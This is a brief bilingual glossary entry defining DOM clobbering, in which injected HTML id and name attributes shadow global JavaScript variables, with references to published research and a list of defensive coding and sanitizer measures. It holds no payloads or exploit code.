DOM Clobbering.

A browser-side technique in which attacker-controlled HTML elements with `id` or `name` attributes shadow global JavaScript variables, turning seemingly harmless markup into a vector for XSS, CSP bypass, and gadget chaining. 它属于网络安全的 应用安全 分类。

A browser-side technique in which attacker-controlled HTML elements with `id` or `name` attributes shadow global JavaScript variables, turning seemingly harmless markup into a vector for XSS, CSP bypass, and gadget chaining.

DOM clobbering exploits a legacy DOM feature: any HTML element with an `id` or `name` attribute is exposed as a property on `window` (and, for form fields, on its parent form). An attacker who can inject limited HTML — say through a markdown renderer or a relaxed sanitizer — can therefore create variables that override or define globals, even with all script tags blocked. Classic targets include `window.config`, library globals such as `_wpemojiSettings`, and properties a strict CSP otherwise protects. Modern research (Khodayari & Pellegrino, Heyes, and the 2023 attacks on widely used sanitizers like DOMPurify) demonstrated reliable gadget chains turning HTML-only injection into full XSS by hijacking framework lookups (`window.config.url`, `document.currentScript.src`). Defenses include using `document.getElementById` instead of bare global lookups, accessing globals via `let`/`const`, locking sensitive properties on `window`, and configuring sanitizers to strip or namespace `id`/`name` attributes on user-controlled HTML.

针对 DOM Clobbering 的防御通常结合技术控制与运营实践,详见上方完整定义。

常见的别称包括: HTML namespace pollution, Named-element global hijack。